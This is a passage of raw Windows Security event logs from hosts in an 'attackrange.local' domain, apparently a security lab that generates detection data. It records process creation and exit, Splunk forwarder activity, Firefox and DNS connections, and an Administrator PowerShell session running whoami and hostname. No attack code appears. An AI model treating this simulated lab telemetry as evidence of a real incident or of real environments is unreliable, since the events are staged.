New Process ID: 0x12b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278752
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x560
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278751
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x14bc
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:26:57 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278750
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278757
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x17d8
Process Name: C:\Windows\System32\whoami.exe
Exit Status: 0x0
04/19/2021 06:26:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278756
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17d8
New Process Name: C:\Windows\System32\whoami.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\whoami.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278755
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1e08
Process Name: C:\Windows\System32\HOSTNAME.EXE
Exit Status: 0x0
04/19/2021 06:26:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278754
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e08
New Process Name: C:\Windows\System32\HOSTNAME.EXE
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\HOSTNAME.EXE"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:58 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278753
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x560
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:26:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278760
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1e24
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:26:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278759
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1e24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:59 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278758
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53889
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278763
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278762
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x344
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:27:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278761
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x344
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887019
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1251
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:00 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887018
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1251
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:01 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278764
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x14c
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278775
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53891
Destination Address: 142.250.69.196
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278774
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53890
Destination Address: 142.250.69.196
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278773
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 56669
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278772
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56669
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278771
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56669
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278770
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 55232
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278769
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55232
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278768
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55232
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278767
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 58062
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278766
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58062
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278765
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58062
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887024
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 54501
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887023
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 56669
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887022
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 55232
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887021
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53487
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:03 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887020
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 58062
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:04 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278776
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53892
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278779
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53894
Destination Address: 54.149.10.221
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278778
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8bc
New Process Name: C:\Program Files\Mozilla Firefox\firefox.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\Low Mandatory Level
Creator Process ID: 0x118c
Creator Process Name: C:\Program Files\Mozilla Firefox\firefox.exe
Process Command Line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4492.41.1031178363\1350564989" -childID 6 -isForBrowser -prefsHandle 2872 -prefMapHandle 4936 -prefsLen 12012 -prefMapSize 238405 -parentBuildID 20210318103112 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4492 "\\.\pipe\gecko-crash-server-pipe.4492" 2944 tab
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:05 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278777
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4492
Application Name: \device\harddiskvolume1\program files\mozilla firefox\firefox.exe
Network Information:
Direction: Outbound
